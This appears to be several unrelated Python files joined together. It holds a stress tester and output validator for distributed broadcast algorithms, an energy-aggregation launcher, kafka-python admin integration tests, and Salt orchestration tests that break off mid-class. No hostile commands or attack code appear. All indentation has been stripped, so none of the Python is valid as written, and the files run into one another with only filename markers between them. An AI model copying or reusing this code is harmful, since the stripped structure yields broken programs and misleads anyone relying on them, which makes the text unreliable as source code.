# Write hosts file
for i in range(1, self.processes + 1):
hosts.write("{} localhost {}\n".format(i, PROCESSES_BASE_IP + i))
hosts.flush()
# Write config file
config.write("{}\n".format(self.messages))
for process in range(1, self.processes + 1):
l = [process] + self.dependencies[process]
config.write("{}\n".format(" ".join(map(str, l))))
config.flush()
return (hosts, config)
def checkProcess(self, pid):
deps = self.createMessageDependencies(pid)
if deps is False:
return False
for process in range(1, self.processes + 1):
if process == pid:
continue
filePath = os.path.join(
self.outputDirPath, "proc{:02d}.output".format(process)
)
received = defaultdict(lambda: 0)
filename = os.path.basename(filePath)
with open(filePath) as f:
for lineNumber, line in enumerate(f):
tokens = line.split()
if tokens[0] == "d":
sender = int(tokens[1])
msg = int(tokens[2])
if sender == pid:
for (p, num) in deps[msg].items():
if num > received[p]:
print(
"File {}, Line {}: Causal ordering of process {} not respected. Expected message {} from {} but last message got was {}".format(
filename,
lineNumber,
pid,
num,
p,
received[p],
)
)
return False
received[sender] = msg
return True
def createMessageDependencies(self, pid):
filePath = os.path.join(self.outputDirPath, "proc{:02d}.output".format(pid))
i = 1
nextMessage = defaultdict(lambda: 1)
filename = os.path.basename(filePath)
messageDeps = dict()
vectorClock = dict()
myDependencies = self.dependencies[pid]
with open(filePath) as f:
for lineNumber, line in enumerate(f):
tokens = line.split()
# Check broadcast
if tokens[0] == "b":
msg = int(tokens[1])
if msg != i:
print(
"File {}, Line {}: Messages broadcast out of order. Expected message {} but broadcast message {}".format(
filename, lineNumber, i, msg
)
)
return False
messageDeps[msg] = vectorClock.copy()
i += 1
# Check delivery
if tokens[0] == "d":
sender = int(tokens[1])
msg = int(tokens[2])
if msg != nextMessage[sender]:
print(
"File {}, Line {}: Message delivered out of order. Expected message {}, but delivered message {}".format(
filename, lineNumber, nextMessage[sender], msg
)
)
return False
nextMessage[sender] += 1
if sender in myDependencies:
vectorClock[sender] = msg
return messageDeps
class StressTest:
def __init__(self, procs, concurrency, attempts, attemptsRatio):
self.processes = len(procs)
self.processesInfo = dict()
for (logicalPID, handle) in procs:
self.processesInfo[logicalPID] = ProcessInfo(handle)
self.concurrency = concurrency
self.attempts = attempts
self.attemptsRatio = attemptsRatio
maxTerminatedProcesses = (
self.processes // 2
if self.processes % 2 == 1
else (self.processes - 1) // 2
)
self.terminatedProcs = AtomicSaturatedCounter(maxTerminatedProcesses)
def stress(self):
selectProc = list(range(1, self.processes + 1))
random.shuffle(selectProc)
selectOp = (
[ProcessState.STOPPED] * int(1000 * self.attemptsRatio["STOP"])
+ [ProcessState.RUNNING] * int(1000 * self.attemptsRatio["CONT"])
+ [ProcessState.TERMINATED] * int(1000 * self.attemptsRatio["TERM"])
)
random.shuffle(selectOp)
successfulAttempts = 0
while successfulAttempts < self.attempts:
proc = random.choice(selectProc)
op = random.choice(selectOp)
info = self.processesInfo[proc]
with info.lock:
if ProcessInfo.validStateTransition(info.state, op):
if op == ProcessState.TERMINATED:
reserved = self.terminatedProcs.reserve()
if reserved:
selectProc.remove(proc)
else:
continue
time.sleep(float(random.randint(50, 500)) / 1000.0)
info.handle.send_signal(ProcessInfo.stateToSignal(op))
info.state = op
successfulAttempts += 1
print(
"Sending {} to process {}".format(
ProcessInfo.stateToSignalStr(op), proc
)
)
# if op == ProcessState.TERMINATED and proc not in terminatedProcs:
# if len(terminatedProcs) < maxTerminatedProcesses:
# terminatedProcs.add(proc)
# if len(terminatedProcs) == maxTerminatedProcesses:
# break
def remainingUnterminatedProcesses(self):
remaining = []
for pid, info in self.processesInfo.items():
with info.lock:
if info.state != ProcessState.TERMINATED:
remaining.append(pid)
return None if len(remaining) == 0 else remaining
def terminateAllProcesses(self):
for _, info in self.processesInfo.items():
with info.lock:
if info.state != ProcessState.TERMINATED:
if info.state == ProcessState.STOPPED:
info.handle.send_signal(
ProcessInfo.stateToSignal(ProcessState.RUNNING)
)
info.handle.send_signal(
ProcessInfo.stateToSignal(ProcessState.TERMINATED)
)
return False
def continueStoppedProcesses(self):
for _, info in self.processesInfo.items():
with info.lock:
if info.state != ProcessState.TERMINATED:
if info.state == ProcessState.STOPPED:
info.handle.send_signal(
ProcessInfo.stateToSignal(ProcessState.RUNNING)
)
def run(self):
if self.concurrency > 1:
threads = [
threading.Thread(target=self.stress) for _ in range(self.concurrency)
]
[p.start() for p in threads]
[p.join() for p in threads]
else:
self.stress()
def startProcesses(processes, runscript, hostsFilePath, configFilePath, outputDir):
runscriptPath = os.path.abspath(runscript)
if not os.path.isfile(runscriptPath):
raise Exception("`{}` is not a file".format(runscriptPath))
if os.path.basename(runscriptPath) != "run.sh":
raise Exception("`{}` is not a runscript".format(runscriptPath))
outputDirPath = os.path.abspath(outputDir)
if not os.path.isdir(outputDirPath):
raise Exception("`{}` is not a directory".format(outputDirPath))
baseDir, _ = os.path.split(runscriptPath)
bin_cpp = os.path.join(baseDir, "bin", "da_proc")
bin_java = os.path.join(baseDir, "bin", "da_proc.jar")
if os.path.exists(bin_cpp):
cmd = [bin_cpp]
elif os.path.exists(bin_java):
cmd = ["java", "-jar", bin_java]
else:
raise Exception(
"`{}` could not find a binary to execute. Make sure you build before validating".format(
runscriptPath
)
)
procs = []
for pid in range(1, processes + 1):
cmd_ext = [
"--id",
str(pid),
"--hosts",
hostsFilePath,
"--barrier",
"{}:{}".format(BARRIER_IP, BARRIER_PORT),
"--signal",
"{}:{}".format(SIGNAL_IP, SIGNAL_PORT),
"--output",
os.path.join(outputDirPath, "proc{:02d}.output".format(pid)),
configFilePath,
]
stdoutFd = open(
os.path.join(outputDirPath, "proc{:02d}.stdout".format(pid)), "w"
)
stderrFd = open(
os.path.join(outputDirPath, "proc{:02d}.stderr".format(pid)), "w"
)
procs.append(
(pid, subprocess.Popen(cmd + cmd_ext, stdout=stdoutFd, stderr=stderrFd))
)
return procs
def main(processes, messages, runscript, broadcastType, logsDir, testConfig):
# Set tc for loopback
tc = TC(testConfig["TC"])
print(tc)
# Start the barrier
initBarrier = barrier.Barrier(BARRIER_IP, BARRIER_PORT, processes)
initBarrier.listen()
startTimesFuture = initBarrier.startTimesFuture()
initBarrierThread = threading.Thread(target=initBarrier.wait)
initBarrierThread.start()
# Start the finish signal
finishSignal = finishedSignal.FinishedSignal(SIGNAL_IP, SIGNAL_PORT, processes)
finishSignal.listen()
finishSignalThread = threading.Thread(target=finishSignal.wait)
finishSignalThread.start()
dependencies = {
1: [2, 4],
2: [3],
5: [1],
}
if broadcastType == "fifo":
validation = FifoBroadcastValidation(processes, messages, logsDir)
else:
validation = LCausalBroadcastValidation(
processes, messages, logsDir, dependencies
)
hostsFile, configFile = validation.generateConfig()
try:
# Start the processes and get their PIDs
procs = startProcesses(
processes, runscript, hostsFile.name, configFile.name, logsDir
)
# Create the stress test
st = StressTest(
procs,
testConfig["ST"]["concurrency"],
testConfig["ST"]["attempts"],
testConfig["ST"]["attemptsDistribution"],
)
for (logicalPID, procHandle) in procs:
print(
"Process with logicalPID {} has PID {}".format(
logicalPID, procHandle.pid
)
)
initBarrierThread.join()
print("All processes have been initialized.")
st.run()
print("StressTest is complete.")
print("Resuming stopped processes.")
st.continueStoppedProcesses()
print("Waiting until all running processes have finished broadcasting.")
finishSignalThread.join()
for pid, startTs in OrderedDict(sorted(startTimesFuture.items())).items():
print(
"Process {} finished broadcasting {} messages in {} ms".format(
pid, messages, finishSignal.endTimestamps()[pid] - startTs
)
)
unterminated = st.remainingUnterminatedProcesses()
if unterminated is not None:
input(
"Hit `Enter` to terminate the remaining processes with logicalPIDs {}.".format(
unterminated
)
)
st.terminateAllProcesses()
mutex = threading.Lock()
def waitForProcess(logicalPID, procHandle, mutex):
procHandle.wait()
with mutex:
print(
"Process {} exited with {}".format(
logicalPID, procHandle.returncode
)
)
# Monitor which processes have exited
monitors = [
threading.Thread(
target=waitForProcess, args=(logicalPID, procHandle, mutex)
)
for (logicalPID, procHandle) in procs
]
[p.start() for p in monitors]
[p.join() for p in monitors]
input("Hit `Enter` to validate the output")
print("Result of validation: {}".format(validation.checkAll()))
finally:
if procs is not None:
for _, p in procs:
p.kill()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"-r",
"--runscript",
required=True,
dest="runscript",
help="Path to run.sh",
)
parser.add_argument(
"-b",
"--broadcast",
choices=["fifo", "lcausal"],
required=True,
dest="broadcastType",
help="Which broadcast implementation to test",
)
parser.add_argument(
"-l",
"--logs",
required=True,
dest="logsDir",
help="Directory to store stdout, stderr and outputs generated by the processes",
)
parser.add_argument(
"-p",
"--processes",
required=True,
type=int,
dest="processes",
help="Number of processes that broadcast",
)
parser.add_argument(
"-m",
"--messages",
required=True,
type=int,
dest="messages",
help="Maximum number (because it can crash) of messages that each process can broadcast",
)
results = parser.parse_args()
testConfig = {
# Network configuration using the tc command
"TC": {
"delay": ("200ms", "50ms"),
"loss": ("10%", "25%"),
"reordering": ("25%", "50%"),
},
# StressTest configuration
"ST": {
"concurrency": 8, # How many threads are interferring with the running processes
"attempts": 8, # How many interferring attempts each threads does
"attemptsDistribution": { # Probability with which an interferring thread will
"STOP": 0.48, # select an interferring action (make sure they add up to 1)
"CONT": 0.48,
"TERM": 0.04,
},
},
}
main(
results.processes,
results.messages,
results.runscript,
results.broadcastType,
results.logsDir,
testConfig,
)
|
main.py | import logging
from logging.handlers import RotatingFileHandler
from multiprocessing import Process
import combined_equipment_energy_input_category
import combined_equipment_energy_input_item
import combined_equipment_energy_output_category
import combined_equipment_billing_input_category
import combined_equipment_billing_input_item
import combined_equipment_billing_output_category
import equipment_energy_input_category
import equipment_energy_input_item
import equipment_energy_output_category
import equipment_billing_input_category
import equipment_billing_input_item
import equipment_billing_output_category
import meter_carbon
import meter_billing
import offline_meter_carbon
import offline_meter_billing
import shopfloor_billing_input_category
import shopfloor_billing_input_item
import shopfloor_energy_input_category
import shopfloor_energy_input_item
import space_billing_input_category
import space_billing_input_item
import space_billing_output_category
import space_energy_input_category
import space_energy_input_item
import space_energy_output_category
import store_billing_input_category
import store_billing_input_item
import store_energy_input_category
import store_energy_input_item
import tenant_billing_input_category
import tenant_billing_input_item
import tenant_energy_input_category
import tenant_energy_input_item
import virtual_meter_carbon
import virtual_meter_billing
def main():
"""main"""
# create logger
logger = logging.getLogger('myems-aggregation')
# specifies the lowest-severity log message a logger will handle,
# where debug is the lowest built-in severity level and critical is the highest built-in severity.
# For example, if the severity level is INFO, the logger will handle only INFO, WARNING, ERROR, and CRITICAL
# messages and will ignore DEBUG messages.
logger.setLevel(logging.ERROR)
# create file handler which logs messages
fh = RotatingFileHandler('myems-aggregation.log', maxBytes=1024*1024, backupCount=1)
# create formatter and add it to the handlers
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
# add the handlers to logger
logger.addHandler(fh)
# send logging output to sys.stderr
logger.addHandler(logging.StreamHandler())
# combined equipment energy input by energy categories
Process(target=combined_equipment_energy_input_category.main, args=(logger,)).start()
# combined equipment energy input by energy items
Process(target=combined_equipment_energy_input_item.main, args=(logger,)).start()
# combined equipment energy output by energy categories
Process(target=combined_equipment_energy_output_category.main, args=(logger,)).start()
# combined equipment billing input by energy categories
Process(target=combined_equipment_billing_input_category.main, args=(logger,)).start()
# combined equipment billing input by energy items
Process(target=combined_equipment_billing_input_item.main, args=(logger,)).start()
# combined equipment billing output by energy categories
Process(target=combined_equipment_billing_output_category.main, args=(logger,)).start()
# equipment billing input by energy categories
Process(target=equipment_billing_input_category.main, args=(logger,)).start()
# equipment billing input by energy items
Process(target=equipment_billing_input_item.main, args=(logger,)).start()
# equipment billing output by energy categories
Process(target=equipment_billing_output_category.main, args=(logger,)).start()
# equipment energy input by energy categories
Process(target=equipment_energy_input_category.main, args=(logger,)).start()
# equipment energy input by energy items
Process(target=equipment_energy_input_item.main, args=(logger,)).start()
# equipment energy output by energy categories
Process(target=equipment_energy_output_category.main, args=(logger,)).start()
# meter carbon
Process(target=meter_carbon.main, args=(logger,)).start()
# meter billing
Process(target=meter_billing.main, args=(logger,)).start()
# offline meter carbon dioxide emission
Process(target=offline_meter_carbon.main, args=(logger,)).start()
# offline meter billing
Process(target=offline_meter_billing.main, args=(logger,)).start()
# shopfloor billing input by energy categories
Process(target=shopfloor_billing_input_category.main, args=(logger,)).start()
# shopfloor billing input by energy items
Process(target=shopfloor_billing_input_item.main, args=(logger,)).start()
# shopfloor energy input by energy categories
Process(target=shopfloor_energy_input_category.main, args=(logger,)).start()
# shopfloor energy input by energy items
Process(target=shopfloor_energy_input_item.main, args=(logger,)).start()
# space billing input by energy categories
Process(target=space_billing_input_category.main, args=(logger,)).start()
# space billing input by energy items
Process(target=space_billing_input_item.main, args=(logger,)).start()
# space billing output by energy categories
Process(target=space_billing_output_category.main, args=(logger,)).start()
# space energy input by energy categories
Process(target=space_energy_input_category.main, args=(logger,)).start()
# space energy input by energy items
Process(target=space_energy_input_item.main, args=(logger,)).start()
# space energy output by energy categories
Process(target=space_energy_output_category.main, args=(logger,)).start()
# store billing input by energy categories
Process(target=store_billing_input_category.main, args=(logger,)).start()
# store billing input by energy items
Process(target=store_billing_input_item.main, args=(logger,)).start()
# store energy input by energy categories
Process(target=store_energy_input_category.main, args=(logger,)).start()
# store energy input by energy items
Process(target=store_energy_input_item.main, args=(logger,)).start()
# tenant billing input by energy categories
Process(target=tenant_billing_input_category.main, args=(logger,)).start()
# tenant billing input by energy items
Process(target=tenant_billing_input_item.main, args=(logger,)).start()
# tenant energy input by energy categories
Process(target=tenant_energy_input_category.main, args=(logger,)).start()
# tenant energy input by energy items
Process(target=tenant_energy_input_item.main, args=(logger,)).start()
# virtual meter carbon dioxide emission
Process(target=virtual_meter_carbon.main, args=(logger,)).start()
# virtual meter billing (cost or income)
Process(target=virtual_meter_billing.main, args=(logger,)).start()
if __name__ == '__main__':
main()
|
test_admin_integration.py | import pytest
from logging import info
from test.testutil import env_kafka_version, random_string
from threading import Event, Thread
from time import time, sleep
from kafka.admin import (
ACLFilter, ACLOperation, ACLPermissionType, ResourcePattern, ResourceType, ACL, ConfigResource, ConfigResourceType)
from kafka.errors import (NoError, GroupCoordinatorNotAvailableError, NonEmptyGroupError, GroupIdNotFoundError)
@pytest.mark.skipif(env_kafka_version() < (0, 11), reason="ACL features require broker >=0.11")
def test_create_describe_delete_acls(kafka_admin_client):
"""Tests that we can add, list and remove ACLs
"""
# Check that we don't have any ACLs in the cluster
acls, error = kafka_admin_client.describe_acls(
ACLFilter(
principal=None,
host="*",
operation=ACLOperation.ANY,
permission_type=ACLPermissionType.ANY,
resource_pattern=ResourcePattern(ResourceType.TOPIC, "topic")
)
)
assert error is NoError
assert len(acls) == 0
# Try to add an ACL
acl = ACL(
principal="User:test",
host="*",
operation=ACLOperation.READ,
permission_type=ACLPermissionType.ALLOW,
resource_pattern=ResourcePattern(ResourceType.TOPIC, "topic")
)
result = kafka_admin_client.create_acls([acl])
assert len(result["failed"]) == 0
assert len(result["succeeded"]) == 1
# Check that we can list the ACL we created
acl_filter = ACLFilter(
principal=None,
host="*",
operation=ACLOperation.ANY,
permission_type=ACLPermissionType.ANY,
resource_pattern=ResourcePattern(ResourceType.TOPIC, "topic")
)
acls, error = kafka_admin_client.describe_acls(acl_filter)
assert error is NoError
assert len(acls) == 1
# Remove the ACL
delete_results = kafka_admin_client.delete_acls(
[
ACLFilter(
principal="User:test",
host="*",
operation=ACLOperation.READ,
permission_type=ACLPermissionType.ALLOW,
resource_pattern=ResourcePattern(ResourceType.TOPIC, "topic")
)
]
)
assert len(delete_results) == 1
assert len(delete_results[0][1]) == 1 # Check number of affected ACLs
# Make sure the ACL does not exist in the cluster anymore
acls, error = kafka_admin_client.describe_acls(
ACLFilter(
principal="*",
host="*",
operation=ACLOperation.ANY,
permission_type=ACLPermissionType.ANY,
resource_pattern=ResourcePattern(ResourceType.TOPIC, "topic")
)
)
assert error is NoError
assert len(acls) == 0
@pytest.mark.skipif(env_kafka_version() < (0, 11), reason="Describe config features require broker >=0.11")
def test_describe_configs_broker_resource_returns_configs(kafka_admin_client):
"""Tests that describe config returns configs for broker
"""
broker_id = kafka_admin_client._client.cluster._brokers[0].nodeId
configs = kafka_admin_client.describe_configs([ConfigResource(ConfigResourceType.BROKER, broker_id)])
assert len(configs) == 1
assert configs[0].resources[0][2] == ConfigResourceType.BROKER
assert configs[0].resources[0][3] == str(broker_id)
assert len(configs[0].resources[0][4]) > 1
@pytest.mark.xfail(condition=True,
reason="https://github.com/dpkp/kafka-python/issues/1929",
raises=AssertionError)
@pytest.mark.skipif(env_kafka_version() < (0, 11), reason="Describe config features require broker >=0.11")
def test_describe_configs_topic_resource_returns_configs(topic, kafka_admin_client):
"""Tests that describe config returns configs for topic
"""
configs = kafka_admin_client.describe_configs([ConfigResource(ConfigResourceType.TOPIC, topic)])
assert len(configs) == 1
assert configs[0].resources[0][2] == ConfigResourceType.TOPIC
assert configs[0].resources[0][3] == topic
assert len(configs[0].resources[0][4]) > 1
@pytest.mark.skipif(env_kafka_version() < (0, 11), reason="Describe config features require broker >=0.11")
def test_describe_configs_mixed_resources_returns_configs(topic, kafka_admin_client):
"""Tests that describe config returns configs for mixed resource types (topic + broker)
"""
broker_id = kafka_admin_client._client.cluster._brokers[0].nodeId
configs = kafka_admin_client.describe_configs([
ConfigResource(ConfigResourceType.TOPIC, topic),
ConfigResource(ConfigResourceType.BROKER, broker_id)])
assert len(configs) == 2
for config in configs:
assert (config.resources[0][2] == ConfigResourceType.TOPIC
and config.resources[0][3] == topic) or \
(config.resources[0][2] == ConfigResourceType.BROKER
and config.resources[0][3] == str(broker_id))
assert len(config.resources[0][4]) > 1
@pytest.mark.skipif(env_kafka_version() < (0, 11), reason="Describe config features require broker >=0.11")
def test_describe_configs_invalid_broker_id_raises(kafka_admin_client):
"""Tests that describe config raises exception on non-integer broker id
"""
broker_id = "str"
with pytest.raises(ValueError):
configs = kafka_admin_client.describe_configs([ConfigResource(ConfigResourceType.BROKER, broker_id)])
@pytest.mark.skipif(env_kafka_version() < (0, 11), reason='Describe consumer group requires broker >=0.11')
def test_describe_consumer_group_does_not_exist(kafka_admin_client):
"""Tests that the describe consumer group call fails if the group coordinator is not available
"""
with pytest.raises(GroupCoordinatorNotAvailableError):
group_description = kafka_admin_client.describe_consumer_groups(['test'])
@pytest.mark.skipif(env_kafka_version() < (0, 11), reason='Describe consumer group requires broker >=0.11')
def test_describe_consumer_group_exists(kafka_admin_client, kafka_consumer_factory, topic):
"""Tests that the describe consumer group call returns valid consumer group information
This test takes inspiration from the test 'test_group' in test_consumer_group.py.
"""
consumers = {}
stop = {}
threads = {}
random_group_id = 'test-group-' + random_string(6)
group_id_list = [random_group_id, random_group_id + '_2']
generations = {group_id_list[0]: set(), group_id_list[1]: set()}
def consumer_thread(i, group_id):
assert i not in consumers
assert i not in stop
stop[i] = Event()
consumers[i] = kafka_consumer_factory(group_id=group_id)
while not stop[i].is_set():
consumers[i].poll(20)
consumers[i].close()
consumers[i] = None
stop[i] = None
num_consumers = 3
for i in range(num_consumers):
group_id = group_id_list[i % 2]
t = Thread(target=consumer_thread, args=(i, group_id,))
t.start()
threads[i] = t
try:
timeout = time() + 35
while True:
for c in range(num_consumers):
# Verify all consumers have been created
if c not in consumers:
break
# Verify all consumers have an assignment
elif not consumers[c].assignment():
break
# If all consumers exist and have an assignment
else:
info('All consumers have assignment... checking for stable group')
# Verify all consumers are in the same generation
# then log state and break while loop
for consumer in consumers.values():
generations[consumer.config['group_id']].add(consumer._coordinator._generation.generation_id)
is_same_generation = any([len(consumer_generation) == 1 for consumer_generation in generations.values()])
# New generation assignment is not complete until
# coordinator.rejoining = False
rejoining = any([consumer._coordinator.rejoining
for consumer in list(consumers.values())])
if not rejoining and is_same_generation:
break
else:
sleep(1)
assert time() < timeout, "timeout waiting for assignments"
info('Group stabilized; verifying assignment')
output = kafka_admin_client.describe_consumer_groups(group_id_list)
assert len(output) == 2
consumer_groups = set()
for consumer_group in output:
assert(consumer_group.group in group_id_list)
if consumer_group.group == group_id_list[0]:
assert(len(consumer_group.members) == 2)
else:
assert(len(consumer_group.members) == 1)
for member in consumer_group.members:
assert(member.member_metadata.subscription[0] == topic)
assert(member.member_assignment.assignment[0][0] == topic)
consumer_groups.add(consumer_group.group)
assert(sorted(list(consumer_groups)) == group_id_list)
finally:
info('Shutting down %s consumers', num_consumers)
for c in range(num_consumers):
info('Stopping consumer %s', c)
stop[c].set()
threads[c].join()
threads[c] = None
@pytest.mark.skipif(env_kafka_version() < (1, 1), reason="Delete consumer groups requires broker >=1.1")
def test_delete_consumergroups(kafka_admin_client, kafka_consumer_factory, send_messages):
random_group_id = 'test-group-' + random_string(6)
group1 = random_group_id + "_1"
group2 = random_group_id + "_2"
group3 = random_group_id + "_3"
send_messages(range(0, 100), partition=0)
consumer1 = kafka_consumer_factory(group_id=group1)
next(consumer1)
consumer1.close()
consumer2 = kafka_consumer_factory(group_id=group2)
next(consumer2)
consumer2.close()
consumer3 = kafka_consumer_factory(group_id=group3)
next(consumer3)
consumer3.close()
consumergroups = {group_id for group_id, _ in kafka_admin_client.list_consumer_groups()}
assert group1 in consumergroups
assert group2 in consumergroups
assert group3 in consumergroups
delete_results = {
group_id: error
for group_id, error in kafka_admin_client.delete_consumer_groups([group1, group2])
}
assert delete_results[group1] == NoError
assert delete_results[group2] == NoError
assert group3 not in delete_results
consumergroups = {group_id for group_id, _ in kafka_admin_client.list_consumer_groups()}
assert group1 not in consumergroups
assert group2 not in consumergroups
assert group3 in consumergroups
@pytest.mark.skipif(env_kafka_version() < (1, 1), reason="Delete consumer groups requires broker >=1.1")
def test_delete_consumergroups_with_errors(kafka_admin_client, kafka_consumer_factory, send_messages):
random_group_id = 'test-group-' + random_string(6)
group1 = random_group_id + "_1"
group2 = random_group_id + "_2"
group3 = random_group_id + "_3"
send_messages(range(0, 100), partition=0)
consumer1 = kafka_consumer_factory(group_id=group1)
next(consumer1)
consumer1.close()
consumer2 = kafka_consumer_factory(group_id=group2)
next(consumer2)
consumergroups = {group_id for group_id, _ in kafka_admin_client.list_consumer_groups()}
assert group1 in consumergroups
assert group2 in consumergroups
assert group3 not in consumergroups
delete_results = {
group_id: error
for group_id, error in kafka_admin_client.delete_consumer_groups([group1, group2, group3])
}
assert delete_results[group1] == NoError
assert delete_results[group2] == NonEmptyGroupError
assert delete_results[group3] == GroupIdNotFoundError
consumergroups = {group_id for group_id, _ in kafka_admin_client.list_consumer_groups()}
assert group1 not in consumergroups
assert group2 in consumergroups
assert group3 not in consumergroups
|
test_state.py | """
Tests for the state runner
"""
import errno
import logging
import os
import queue
import shutil
import signal
import tempfile
import textwrap
import threading
import time
import salt.exceptions
import salt.utils.event
import salt.utils.files
import salt.utils.json
import salt.utils.platform
import salt.utils.stringutils
import salt.utils.yaml
from tests.support.case import ShellCase
from tests.support.helpers import expensiveTest, flaky, slowTest
from tests.support.mock import MagicMock, patch
from tests.support.runtests import RUNTIME_VARS
from tests.support.unit import skipIf
log = logging.getLogger(__name__)
@flaky
class StateRunnerTest(ShellCase):
"""
Test the state runner.
"""
RUN_TIMEOUT = 300
def add_to_queue(self, q, cmd):
"""
helper method to add salt-run
return data to a queue
"""
ret = self.run_run(cmd)
q.put(ret)
q.task_done()
@slowTest
def test_orchestrate_output(self):
"""
Ensure the orchestrate runner outputs useful state data.
In Issue #31330, the output only contains ['outputter:', ' highstate'],
and not the full stateful return. This tests ensures we don't regress in that
manner again.
Also test against some sample "good" output that would be included in a correct
orchestrate run.
"""
ret_output = self.run_run("state.orchestrate orch.simple")
bad_out = ["outputter:", " highstate"]
good_out = [
" Function: salt.state",
" Result: True",
"Succeeded: 1 (changed=1)",
"Failed: 0",
"Total states run: 1",
]
# First, check that we don't have the "bad" output that was displaying in
# Issue #31330 where only the highstate outputter was listed
assert bad_out != ret_output
# Now test that some expected good sample output is present in the return.
for item in good_out:
assert item in ret_output
@slowTest
def test_orchestrate_nested(self):
"""
test salt-run state.orchestrate and failhard with nested orchestration
"""
if os.path.exists("/tmp/ewu-2016-12-13"):
os.remove("/tmp/ewu-2016-12-13")
_, code = self.run_run("state.orchestrate nested-orch.outer", with_retcode=True)
assert os.path.exists("/tmp/ewu-2016-12-13") is False
assert code != 0
@slowTest
def test_orchestrate_with_mine(self):
"""
test salt-run state.orchestrate with mine.get call in sls
"""
fail_time = time.time() + 120
self.run_run('mine.update "*"')
exp_ret = "Succeeded: 1 (changed=1)"
while True:
ret = self.run_run("state.orchestrate orch.mine")
try:
assert exp_ret in ret
break
except AssertionError:
if time.time() > fail_time:
self.fail(
'"{}" was not found in the orchestration call'.format(exp_ret)
)
@slowTest
def test_orchestrate_state_and_function_failure(self):
"""
Ensure that returns from failed minions are in the changes dict where
they belong, so they can be programatically analyzed.
See https://github.com/saltstack/salt/issues/43204
"""
self.run_run("saltutil.sync_modules")
ret = salt.utils.json.loads(
"\n".join(self.run_run("state.orchestrate orch.issue43204 --out=json"))
)
# Drill down to the changes dict
state_ret = ret["data"]["master"]["salt_|-Step01_|-Step01_|-state"]["changes"]
func_ret = ret["data"]["master"][
"salt_|-Step02_|-runtests_helpers.nonzero_retcode_return_false_|-function"
]["changes"]
# Remove duration and start time from the results, since they would
# vary with each run and that would make it impossible to test.
for item in ("duration", "start_time"):
state_ret["ret"]["minion"][
"test_|-test fail with changes_|-test fail with changes_|-fail_with_changes"
].pop(item)
self.assertEqual(
state_ret,
{
"out": "highstate",
"ret": {
"minion": {
"test_|-test fail with changes_|-test fail with changes_|-fail_with_changes": {
"__id__": "test fail with changes",
"__run_num__": 0,
"__sls__": "orch.issue43204.fail_with_changes",
"changes": {
"testing": {
"new": "Something pretended to change",
"old": "Unchanged",
}
},
"comment": "Failure!",
"name": "test fail with changes",
"result": False,
}
}
},
},
)
self.assertEqual(func_ret, {"out": "highstate", "ret": {"minion": False}})
@slowTest
def test_orchestrate_target_exists(self):
"""
test orchestration when target exists
while using multiple states
"""
ret = self.run_run("state.orchestrate orch.target-exists")
first = [" ID: core", " Function: salt.state", " Result: True"]
second = [
" ID: test-state",
" Function: salt.state",
" Result: True",
]
third = [
" ID: cmd.run",
" Function: salt.function",
" Result: True",
]
ret_out = [first, second, third]
for out in ret_out:
for item in out:
assert item in ret
@slowTest
def test_orchestrate_retcode(self):
"""
Test orchestration with nonzero retcode set in __context__
"""
self.run_run("saltutil.sync_runners")
self.run_run("saltutil.sync_wheel")
ret = "\n".join(self.run_run("state.orchestrate orch.retcode"))
for result in (
" ID: test_runner_success\n"
" Function: salt.runner\n"
" Name: runtests_helpers.success\n"
" Result: True",
" ID: test_runner_failure\n"
" Function: salt.runner\n"
" Name: runtests_helpers.failure\n"
" Result: False",
" ID: test_wheel_success\n"
" Function: salt.wheel\n"
" Name: runtests_helpers.success\n"
" Result: True",
" ID: test_wheel_failure\n"
" Function: salt.wheel\n"
" Name: runtests_helpers.failure\n"
" Result: False",
):
self.assertIn(result, ret)
@slowTest
def test_orchestrate_target_does_not_exist(self):
"""
test orchestration when target doesn't exist
while using multiple states
"""
ret = self.run_run("state.orchestrate orch.target-does-not-exist")
first = [
"No minions matched the target. No command was sent, no jid was assigned.",
" ID: core",
" Function: salt.state",
" Result: False",
]
second = [
" ID: test-state",
" Function: salt.state",
" Result: True",
]
third = [
" ID: cmd.run",
" Function: salt.function",
" Result: True",
]
ret_out = [first, second, third]
for out in ret_out:
for item in out:
assert item in ret
@slowTest
def test_orchestrate_batch_with_failhard_error(self):
"""
test orchestration properly stops with failhard and batch.
"""
ret = self.run_run("state.orchestrate orch.batch --out=json -l critical")
ret_json = salt.utils.json.loads("\n".join(ret))
retcode = ret_json["retcode"]
result = ret_json["data"]["master"][
"salt_|-call_fail_state_|-call_fail_state_|-state"
]["result"]
changes = ret_json["data"]["master"][
"salt_|-call_fail_state_|-call_fail_state_|-state"
]["changes"]
# Looks like there is a platform differences in execution.
# I see empty changes dict in MacOS for some reason. Maybe it's a bug?
if changes:
changes_ret = changes["ret"]
# Debug
print("Retcode: {}".format(retcode))
print("Changes: {}".format(changes))
print("Result: {}".format(result))
assert retcode != 0
assert result is False
if changes:
# The execution should stop after first error, so return dict should contain only one minion
assert len(changes_ret) == 1
@slowTest
def test_state_event(self):
"""
test to ensure state.event
runner returns correct data
"""
q = queue.Queue(maxsize=0)
cmd = "state.event salt/job/*/new count=1"
expect = '"minions": ["minion"]'
server_thread = threading.Thread(target=self.add_to_queue, args=(q, cmd))
server_thread.setDaemon(True)
server_thread.start()
while q.empty():
self.run_salt("minion test.ping --static")
out = q.get()
assert expect in str(out)
server_thread.join()
@slowTest
def test_orchestrate_subset(self):
"""
test orchestration state using subset
"""
ret = self.run_run("state.orchestrate orch.subset", timeout=500)
def count(thing, listobj):
return sum([obj.strip() == thing for obj in listobj])
assert count("ID: test subset", ret) == 1
assert count("Succeeded: 1", ret) == 1
assert count("Failed: 0", ret) == 1
@slowTest
def test_orchestrate_salt_function_return_false_failure(self):
"""
Ensure that functions that only return False in the return
are flagged as failed when run as orchestrations.
See https://github.com/saltstack/salt/issues/30367
"""
self.run_run("saltutil.sync_modules")
ret = salt.utils.json.loads(
"\n".join(self.run_run("state.orchestrate orch.issue30367 --out=json"))
)
# Drill down to the changes dict
state_result = ret["data"]["master"][
"salt_|-deploy_check_|-test.false_|-function"
]["result"]
func_ret = ret["data"]["master"]["salt_|-deploy_check_|-test.false_|-function"][
"changes"
]
assert state_result is False
self.assertEqual(func_ret, {"out": "highstate", "ret": {"minion": False}})
@skipIf(salt.utils.platform.is_windows(), "*NIX-only test")
@flaky
class OrchEventTest(ShellCase):
"""
Tests for orchestration events
"""
RUN_TIMEOUT = 300
def setUp(self):
self.timeout = 60
